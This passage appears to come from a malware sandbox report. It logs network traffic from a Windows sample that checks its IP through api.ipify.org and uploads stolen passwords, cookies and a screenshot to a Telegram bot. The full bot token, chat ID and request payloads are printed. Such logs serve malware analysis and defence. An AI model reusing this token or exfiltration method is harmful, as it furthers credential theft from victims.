tM0'iX?Zl/PNPLPe:n7i}Le{XQT$Z4YE3+#H^#gUT52eEQV5rFFeI'w+!lm-"-dAQx\&vKy;ts&$R]q:pB3
2025-01-08 11:30:44 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 64 35 30 65 64 63 38 66 62 34 2d 2d 0d 0a Data Ascii: -----------------------------8dd2fd50edc8fb4--
2025-01-08 11:30:44 UTC	1128	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:30:44 GMT Content-Type: application/json Content-Length: 740 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":137990,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736335844,"document":{"file_name":"user-116938 2025-01-08 11-10-28.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAECGwZnfmHkgssUtuVWPZdHM_uHSqKJqwACRRYAAj848VPXTknpP8MzkjYE","file_unique_id":"AgADRRYAAj848VM","file_size":3431},"caption":"New CO Recovered!\n\nTime: 01/08/2025 11:10:28\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.189","caption_entities":[{"offset":182,"length":12,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49718	104.26.12.205	443	4564	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:30:48 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2025-01-08 11:30:48 UTC	424	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 11:30:48 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8febdb8b7f5272ab-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1992&min_rtt=1984&rtt_var=750&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1471774&cwnd=208&unsent_bytes=0&cid=76d280aea6c0b72a&ts=182&x=0"
2025-01-08 11:30:48 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49722	149.154.167.220	443	4564	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:30:50 UTC	260	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd2fc71fe14368 Host: api.telegram.org Content-Length: 980 Expect: 100-continue Connection: Keep-Alive
2025-01-08 11:30:50 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:30:50 UTC	980	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 63 37 31 66 65 31 34 33 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 63 37 31 66 65 31 34 33 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 30 38 2f 32 30 32 35 20 30 38 3a 35 30 3a 34 35 0a 55 73 65 72 Data Ascii: -----------------------------8dd2fc71fe14368Content-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd2fc71fe14368Content-Disposition: form-data; name="caption"New PW Recovered!Time: 01/08/2025 08:50:45User
2025-01-08 11:30:51 UTC	1124	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:30:51 GMT Content-Type: application/json Content-Length: 736 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":137991,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736335851,"document":{"file_name":"user-116938 2025-01-08 09-30-43.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAECGwdnfmHrtvkAAbNR3ryqM1I8kT_ZX9YAAkYWAAI_OPFTrQ09wxGcArU2BA","file_unique_id":"AgADRhYAAj848VM","file_size":351},"caption":"New PW Recovered!\n\nTime: 01/08/2025 08:50:45\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.189","caption_entities":[{"offset":182,"length":12,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49724	149.154.167.220	443	4564	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:30:52 UTC	237	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd2fd944614e4e Host: api.telegram.org Content-Length: 4065 Expect: 100-continue
2025-01-08 11:30:52 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:30:52 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 64 39 34 34 36 31 34 65 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 64 39 34 34 36 31 34 65 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 30 38 2f 32 30 32 35 20 31 31 3a 34 30 3a 33 35 0a 55 73 65 72 Data Ascii: -----------------------------8dd2fd944614e4eContent-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd2fd944614e4eContent-Disposition: form-data; name="caption"New CO Recovered!Time: 01/08/2025 11:40:35User
2025-01-08 11:30:52 UTC	2991	OUT	Data Raw: 14 e3 74 4d 30 1e 27 e8 69 f4 04 58 9f 3f c8 fa 5a bd de f2 f9 c8 6c d0 b3 2f b8 50 9c f9 18 cb 4e c0 cf b4 ac a8 97 8f e8 cb cb 50 4c 50 fa 65 0d 85 b8 b9 da 3a af bf 6e a1 16 37 69 f9 05 7d b2 a8 e0 4c 65 7b 58 51 e5 54 24 e8 0a ca 5a 15 d6 34 59 8a 45 fa 33 2b 23 bc d1 48 5e 10 90 ba c2 8d c3 bc ca a5 23 67 bd b5 8c 14 55 54 35 14 d3 32 ab 65 45 94 14 51 cb 12 56 35 72 84 d3 97 a5 46 d2 15 c1 c8 ad 10 46 d1 95 ab 65 49 c9 12 0f 27 01 77 8c cc 2b d9 82 a6 da aa cb 21 de e8 b6 6c 6d 2d e9 22 2d 85 f9 f9 64 dc 95 1a 41 51 a4 f1 78 a1 96 8c 1d 5c e2 c4 9d ee f5 fb 1a db dc 81 fa 26 f7 c2 1d e6 87 76 4b a0 79 b7 3b d0 c1 ee f2 74 94 b3 73 dd bb e8 f4 92 ad 94 b9 b0 26 9f 24 52 83 5d ed 89 e0 71 c4 eb 9a 94 3a e6 70 04 ae 12 af f1 bb bc 15 ff c7 ec c6 42 33 Data Ascii: tM0'iX?Zl/PNPLPe:n7i}Le{XQT$Z4YE3+#H^#gUT52eEQV5rFFeI'w+!lm-"-dAQx\&vKy;ts&$R]q:pB3
2025-01-08 11:30:52 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 64 39 34 34 36 31 34 65 34 65 2d 2d 0d 0a Data Ascii: -----------------------------8dd2fd944614e4e--
2025-01-08 11:30:52 UTC	1128	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:30:52 GMT Content-Type: application/json Content-Length: 740 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":137992,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736335852,"document":{"file_name":"user-116938 2025-01-08 11-40-35.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAECGwhnfmHskOn88ml41hNGbHCfh627jAACRxYAAj848VPNW_m8eA7hbTYE","file_unique_id":"AgADRxYAAj848VM","file_size":3431},"caption":"New CO Recovered!\n\nTime: 01/08/2025 11:40:35\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.189","caption_entities":[{"offset":182,"length":12,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49725	104.26.12.205	443	4516	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:30:56 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2025-01-08 11:30:56 UTC	424	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 11:30:56 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8febdbc10e7f4282-EWR server-timing: cfL4;desc="?proto=TCP&rtt=2086&min_rtt=2080&rtt_var=792&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1371535&cwnd=252&unsent_bytes=0&cid=f0d353b4923c7544&ts=167&x=0"
2025-01-08 11:30:56 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49726	149.154.167.220	443	4516	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:30:58 UTC	260	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd2fb92eb8a9ae Host: api.telegram.org Content-Length: 980 Expect: 100-continue Connection: Keep-Alive
2025-01-08 11:30:58 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:30:58 UTC	980	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 62 39 32 65 62 38 61 39 61 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 62 39 32 65 62 38 61 39 61 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 30 38 2f 32 30 32 35 20 30 37 3a 35 30 3a 35 35 0a 55 73 65 72 Data Ascii: -----------------------------8dd2fb92eb8a9aeContent-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd2fb92eb8a9aeContent-Disposition: form-data; name="caption"New PW Recovered!Time: 01/08/2025 07:50:55User
2025-01-08 11:30:58 UTC	1124	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:30:58 GMT Content-Type: application/json Content-Length: 736 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":137995,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736335858,"document":{"file_name":"user-116938 2025-01-08 07-50-55.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAECGwtnfmHyuOlVi5AAAVcpeeti7fJ7V3gAAksWAAI_OPFTx43fdk6_lLg2BA","file_unique_id":"AgADSxYAAj848VM","file_size":351},"caption":"New PW Recovered!\n\nTime: 01/08/2025 07:50:55\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.189","caption_entities":[{"offset":182,"length":12,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49727	149.154.167.220	443	4516	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:30:59 UTC	237	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd2fcb53db4a08 Host: api.telegram.org Content-Length: 4065 Expect: 100-continue
2025-01-08 11:31:00 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:31:00 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 63 62 35 33 64 62 34 61 30 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 63 62 35 33 64 62 34 61 30 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 30 38 2f 32 30 32 35 20 30 39 3a 35 30 3a 34 39 0a 55 73 65 72 Data Ascii: -----------------------------8dd2fcb53db4a08Content-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd2fcb53db4a08Content-Disposition: form-data; name="caption"New CO Recovered!Time: 01/08/2025 09:50:49User
2025-01-08 11:31:00 UTC	2991	OUT	Data Raw: 14 e3 74 4d 30 1e 27 e8 69 f4 04 58 9f 3f c8 fa 5a bd de f2 f9 c8 6c d0 b3 2f b8 50 9c f9 18 cb 4e c0 cf b4 ac a8 97 8f e8 cb cb 50 4c 50 fa 65 0d 85 b8 b9 da 3a af bf 6e a1 16 37 69 f9 05 7d b2 a8 e0 4c 65 7b 58 51 e5 54 24 e8 0a ca 5a 15 d6 34 59 8a 45 fa 33 2b 23 bc d1 48 5e 10 90 ba c2 8d c3 bc ca a5 23 67 bd b5 8c 14 55 54 35 14 d3 32 ab 65 45 94 14 51 cb 12 56 35 72 84 d3 97 a5 46 d2 15 c1 c8 ad 10 46 d1 95 ab 65 49 c9 12 0f 27 01 77 8c cc 2b d9 82 a6 da aa cb 21 de e8 b6 6c 6d 2d e9 22 2d 85 f9 f9 64 dc 95 1a 41 51 a4 f1 78 a1 96 8c 1d 5c e2 c4 9d ee f5 fb 1a db dc 81 fa 26 f7 c2 1d e6 87 76 4b a0 79 b7 3b d0 c1 ee f2 74 94 b3 73 dd bb e8 f4 92 ad 94 b9 b0 26 9f 24 52 83 5d ed 89 e0 71 c4 eb 9a 94 3a e6 70 04 ae 12 af f1 bb bc 15 ff c7 ec c6 42 33 Data Ascii: tM0'iX?Zl/PNPLPe:n7i}Le{XQT$Z4YE3+#H^#gUT52eEQV5rFFeI'w+!lm-"-dAQx\&vKy;ts&$R]q:pB3
2025-01-08 11:31:00 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 63 62 35 33 64 62 34 61 30 38 2d 2d 0d 0a Data Ascii: -----------------------------8dd2fcb53db4a08--
2025-01-08 11:31:00 UTC	1128	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:31:00 GMT Content-Type: application/json Content-Length: 740 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":137996,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736335860,"document":{"file_name":"user-116938 2025-01-08 10-00-48.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAECGwxnfmH05kwOW1DywOBFeXjw-XbdhwACTBYAAj848VNcq68_bTWMKzYE","file_unique_id":"AgADTBYAAj848VM","file_size":3431},"caption":"New CO Recovered!\n\nTime: 01/08/2025 09:50:49\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.189","caption_entities":[{"offset":182,"length":12,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49729	149.154.167.220	443	3736	C:\Users\user\AppData\Roaming\wTyVrj.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:32:08 UTC	262	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd3690bd1eb7a0 Host: api.telegram.org Content-Length: 77700 Expect: 100-continue Connection: Keep-Alive
2025-01-08 11:32:08 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:32:08 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 39 30 62 64 31 65 62 37 61 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 39 30 62 64 31 65 62 37 61 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 31 37 2f 32 30 32 35 20 30 30 3a 33 39 3a 30 33 0a 55 73 65 72 Data Ascii: -----------------------------8dd3690bd1eb7a0Content-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd3690bd1eb7a0Content-Disposition: form-data; name="caption"New SC Recovered!Time: 01/17/2025 00:39:03User
2025-01-08 11:32:08 UTC	16355	OUT	Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
2025-01-08 11:32:08 UTC	16355	OUT	Data Raw: b9 3d cd 74 c1 c3 2f ad 71 b7 9a 74 96 aa 1c f2 84 e0 13 c1 fc ab 47 40 93 3b a3 5b 86 ca 8c 98 9c 64 7d 54 f6 ab cd b0 f1 c4 c3 eb b4 e7 75 da df d7 e2 8d f0 b8 28 e1 69 7b 34 ee 2e a3 a4 b2 cf ba d8 65 1f 24 2f a1 f4 ac 8c 57 60 1c 37 07 d6 b9 ed 66 11 0e a0 c5 46 03 8d ff 00 e3 5d 79 36 65 3a ef d8 55 d5 a5 a3 f4 3e 7f 35 cb e3 41 7b 6a 7b 37 b1 42 8a 28 af a4 3c 20 a4 a5 a2 80 3b b9 60 0f f3 27 0d fc ea 01 90 70 7a 8a b8 6a 9b 1f de bf fb c6 bf 3d a8 96 e7 e8 11 24 53 5c 75 ff 00 fc 84 2e 7f eb ab 7f 33 5d 82 9a e3 ef ff 00 e4 21 73 ff 00 5d 5b f9 9a f6 f2 3f e2 4f d0 f1 33 af 82 1e a5 7a 28 a2 be 9c f9 b0 a2 8a 28 00 ae bf c2 1f f2 0b 97 fe bb 9f fd 05 6b 86 d4 3f d4 0f f7 bf c6 a4 7d 02 f1 75 1b 4b 20 f0 b3 dd 46 24 8d d4 9d b8 39 eb c7 b5 72 62 a0 Data Ascii: =t/qtG@;[d}Tu(i{4.e$/W`7fF]y6e:U>5A{j{7B(< ;`'pzj=$S\u.3]!s][?O3z((k?}uK F$9rb
2025-01-08 11:32:08 UTC	16355	OUT	Data Raw: 61 af 4a 3b 1d 08 43 49 4b 48 6a ca 42 52 52 d3 4d 0c a4 25 25 3a 9b 50 ca 42 1a 28 a4 a4 30 a4 a2 92 90 d0 52 1a 5e 94 86 a4 61 f9 d2 52 d2 50 31 39 a3 8a 0d 15 23 3a 6a 28 a2 b2 3c 41 b2 38 8e 36 76 e8 29 d3 98 e0 9d e0 37 30 49 2a 36 c7 54 2d 95 3f 8a 81 f9 54 17 ea 5a ca 55 1d 4a d2 5c dd a7 f6 a5 c5 f0 ba b3 96 d9 99 c9 86 18 1a 39 25 42 3e e3 1f 2c 64 9e 06 49 38 eb d6 b9 6b 55 94 24 92 db 53 bb 0d 42 15 60 dc 9e a4 de 62 7f 7d 7f 3a 6c 93 c7 1a 17 2e b8 1e f5 52 0b d9 be d3 7a 23 d4 44 12 ca e8 d0 dd 6c 75 fd d8 ce 63 f9 41 2b d5 7a 0c 7c b8 e9 8a 75 d5 ec b2 e8 72 59 c3 35 b0 6d 92 2c cb 37 9f ba 46 2c 48 65 db f2 13 8c 60 b0 c8 22 b3 fa d4 ad 7e 53 65 80 87 35 9c d1 75 be 4b 89 a0 24 17 85 ca 36 d3 91 9a 2a bc 4e b3 6a 1a 85 c4 67 74 53 4e ce 87 Data Ascii: aJ;CIKHjBRRM%%:PB(0R^aRP19#:j(<A86v)70I6T-?TZUJ\9%B>,dI8kU$SB`b}:l.Rz#DlucA+z\|urY5m,7F,He`"~Se5uK$6NjgtSN
2025-01-08 11:32:08 UTC	15447	OUT	Data Raw: ff 00 14 6a 7e 86 9e 2e 62 3d 55 85 2b 30 b9 2d 14 c1 34 27 f8 c8 fa 8a 78 28 df 76 45 34 00 51 4b b1 8f 4c 1f a1 a3 6b 0e c6 80 12 8f c2 8e 7b 8a 28 18 51 45 14 00 b5 62 d0 7e f1 ff 00 eb 9b 55 7a b1 68 3e 69 3f eb 9b 54 cf e1 22 7b 1c db 75 a6 d3 9b ef 53 7e 95 b9 d2 84 a0 d1 49 48 61 49 4b 45 05 09 45 14 94 00 7e 54 94 b4 87 eb 48 61 45 1c d2 50 30 a3 ad 14 94 00 bc 52 7e 14 51 40 c4 a2 8e 28 a0 0e 9a 48 dc c8 92 c3 21 8e 54 e8 c3 d3 b8 23 b8 3e 86 a1 68 ae da 74 98 4d 12 3a 29 40 a9 0a 2a 15 3d 41 50 36 9c fb 8a b7 45 73 ca 94 24 ee d1 e3 c3 11 52 9a b4 59 9b 2e 9f 34 f2 49 24 b3 ae 65 84 40 ca a8 aa be 58 20 85 00 0c 01 90 3a 62 a5 8e da ea 17 0d 1d c2 90 22 58 b6 bc 6a ca ca bf 74 30 23 0d 8e d9 ce 2a ed 15 3f 57 a7 d8 d3 eb 95 ff 00 98 cf b8 b7 bb Data Ascii: j~.b=U+0-4'x(vE4QKLk{(QEb~Uzh>i?T"{uS~IHaIKEE~THaEP0R~Q@(H!T#>htM:)@=AP6Es$RY.4I$e@X :b"Xjt0#?W
